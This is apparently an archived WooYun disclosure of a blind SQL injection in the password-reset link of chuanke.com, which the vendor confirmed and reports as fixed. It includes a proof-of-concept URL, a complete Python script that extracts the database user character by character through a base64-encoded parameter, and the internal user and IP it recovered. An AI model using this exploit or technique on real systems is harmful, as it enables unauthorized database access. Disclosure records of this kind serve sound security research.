当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099151

漏洞标题:传课网某处sql 盲注漏洞

相关厂商:chuanke.com

漏洞作者: 1c3z

提交时间:2015-03-03 17:49

修复时间:2015-04-14 17:06

公开时间:2015-04-14 17:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

好像被百度收购了,所以厂商就选了百度了

详细说明:

注入点在找回密码的地方,要老帐号才有这个

传课.PNG


base64 decode得
8ff1a72c16885打码639e134c0a11|1232486|邮箱名打码@qq.com|1425275302|6277
最后面得6277可控 加'号报错
poc s/后面的要进行base64 encode
http://passport.chuanke.com/passwd/reset/s/8ff1a72c16885打码639e134c0a11|1232486|邮箱名打码@qq.com|1425275302|6277' and length(user())=17 正确页面
写了个脚本爆破了下user()

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = '1c3z'
import urllib2
import base64
url = 'http://passport.chuanke.com/passwd/reset/s/'
data = '8ff1a72c16885打码639e134c0a11|1232486|邮箱名打码@qq.com|1425275302|6277'
user = ""
try:
	for x in xrange(1,18):
		cnt = 30 
		print x
		while True:
			try:
				if cnt > 130:
					break
				url = 'http://passport.chuanke.com/passwd/reset/s/'
				payload = "' and ascii(substring(user(),"+str(x)+",1))=" + str(cnt) + "#"
				url += base64.b64encode(data + payload)
				f = urllib2.urlopen(url,timeout=3)
				res = f.read()
				if res.find('验证失败,链接已失效!') == -1:
					print "find:" +str(x) +":"+str(cnt)
					user += str(chr(cnt))
					break
				cnt +=1
			except Exception, e:
				print "timed out"
	print user
except urllib2.HTTPError, e:
	print "error"

漏洞证明:

最后爆破出user()
kkapp@10.67.41.43

修复方案:

过滤

版权声明:转载请注明来源 1c3z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-04 11:47

厂商回复:

感谢提醒!目前已经着手处理中......
也欢迎各位大神来百度传课开设相关技术课程!

最新状态:

2015-04-14:已经修复,感谢@1c3z 的及时发现并提醒。百度传课是中国教育领域新兴的在线教育平台,致力于用互联网的方式来打破中国教育资源地域分布的不平衡,精心打造在线课程发布网站、直播互动教室,提供在线直播互动的一站式全方位的专业教育服务。非常欢迎各位大神前来开设相关安全和技术类课程!